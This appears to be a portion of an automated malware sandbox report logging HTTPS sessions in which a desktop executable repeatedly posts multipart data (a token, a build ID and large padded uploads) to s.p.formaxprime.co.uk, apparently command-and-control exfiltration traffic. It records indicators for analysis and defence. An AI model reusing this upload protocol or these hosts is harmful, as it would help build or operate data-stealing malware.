                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            18192.168.2.44976578.47.63.1324437304C:\Users\user\Desktop\ngbtiladkrthgad.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-03-13 13:50:20 UTC273OUTPOST / HTTP/1.1
                                                                                            Content-Type: multipart/form-data; boundary=----5f3oph4wb1dbaas00zcb
                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
                                                                                            Host: s.p.formaxprime.co.uk
                                                                                            Content-Length: 66001
                                                                                            Connection: Keep-Alive
                                                                                            Cache-Control: no-cache
                                                                                            2025-03-13 13:50:20 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 35 66 33 6f 70 68 34 77 62 31 64 62 61 61 73 30 30 7a 63 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 65 61 37 64 34 36 64 30 33 32 66 38 36 33 36 36 34 62 38 32 37 36 66 65 64 32 39 64 38 66 0d 0a 2d 2d 2d 2d 2d 2d 35 66 33 6f 70 68 34 77 62 31 64 62 61 61 73 30 30 7a 63 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 64 35 64 34 34 64 35 36 36 34 32 34 61 38 62 35 64 31 37 35 61 32 30 38 61 31 64 38 36 31 66 0d 0a 2d 2d 2d 2d 2d 2d 35 66 33 6f 70 68 34 77 62 31 64 62 61 61 73 30 30 7a 63 62 0d 0a 43 6f 6e 74
                                                                                            Data Ascii: ------5f3oph4wb1dbaas00zcbContent-Disposition: form-data; name="token"62ea7d46d032f863664b8276fed29d8f------5f3oph4wb1dbaas00zcbContent-Disposition: form-data; name="build_id"5d5d44d566424a8b5d175a208a1d861f------5f3oph4wb1dbaas00zcbCont
                                                                                            2025-03-13 13:50:20 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:20 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:20 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:20 UTC581OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:21 UTC158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Thu, 13 Mar 2025 13:50:21 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            2025-03-13 13:50:21 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 2ok0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            19192.168.2.44976678.47.63.1324437304C:\Users\user\Desktop\ngbtiladkrthgad.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-03-13 13:50:22 UTC274OUTPOST / HTTP/1.1
                                                                                            Content-Type: multipart/form-data; boundary=----dbs0r9zukxln7qqiecb1
                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
                                                                                            Host: s.p.formaxprime.co.uk
                                                                                            Content-Length: 153381
                                                                                            Connection: Keep-Alive
                                                                                            Cache-Control: no-cache
                                                                                            2025-03-13 13:50:22 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 73 30 72 39 7a 75 6b 78 6c 6e 37 71 71 69 65 63 62 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 65 61 37 64 34 36 64 30 33 32 66 38 36 33 36 36 34 62 38 32 37 36 66 65 64 32 39 64 38 66 0d 0a 2d 2d 2d 2d 2d 2d 64 62 73 30 72 39 7a 75 6b 78 6c 6e 37 71 71 69 65 63 62 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 64 35 64 34 34 64 35 36 36 34 32 34 61 38 62 35 64 31 37 35 61 32 30 38 61 31 64 38 36 31 66 0d 0a 2d 2d 2d 2d 2d 2d 64 62 73 30 72 39 7a 75 6b 78 6c 6e 37 71 71 69 65 63 62 31 0d 0a 43 6f 6e 74
                                                                                            Data Ascii: ------dbs0r9zukxln7qqiecb1Content-Disposition: form-data; name="token"62ea7d46d032f863664b8276fed29d8f------dbs0r9zukxln7qqiecb1Content-Disposition: form-data; name="build_id"5d5d44d566424a8b5d175a208a1d861f------dbs0r9zukxln7qqiecb1Cont
                                                                                            2025-03-13 13:50:22 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:22 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:22 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:22 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:22 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:22 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:22 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:22 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:22 UTC6186OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:23 UTC158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Thu, 13 Mar 2025 13:50:23 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            20192.168.2.44976778.47.63.1324437304C:\Users\user\Desktop\ngbtiladkrthgad.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-03-13 13:50:23 UTC274OUTPOST / HTTP/1.1
                                                                                            Content-Type: multipart/form-data; boundary=----hvsri5p8gdtrqqqq9h4w
                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
                                                                                            Host: s.p.formaxprime.co.uk
                                                                                            Content-Length: 393697
                                                                                            Connection: Keep-Alive
                                                                                            Cache-Control: no-cache
                                                                                            2025-03-13 13:50:23 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 68 76 73 72 69 35 70 38 67 64 74 72 71 71 71 71 39 68 34 77 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 65 61 37 64 34 36 64 30 33 32 66 38 36 33 36 36 34 62 38 32 37 36 66 65 64 32 39 64 38 66 0d 0a 2d 2d 2d 2d 2d 2d 68 76 73 72 69 35 70 38 67 64 74 72 71 71 71 71 39 68 34 77 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 64 35 64 34 34 64 35 36 36 34 32 34 61 38 62 35 64 31 37 35 61 32 30 38 61 31 64 38 36 31 66 0d 0a 2d 2d 2d 2d 2d 2d 68 76 73 72 69 35 70 38 67 64 74 72 71 71 71 71 39 68 34 77 0d 0a 43 6f 6e 74
                                                                                            Data Ascii: ------hvsri5p8gdtrqqqq9h4wContent-Disposition: form-data; name="token"62ea7d46d032f863664b8276fed29d8f------hvsri5p8gdtrqqqq9h4wContent-Disposition: form-data; name="build_id"5d5d44d566424a8b5d175a208a1d861f------hvsri5p8gdtrqqqq9h4wCont
                                                                                            2025-03-13 13:50:23 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
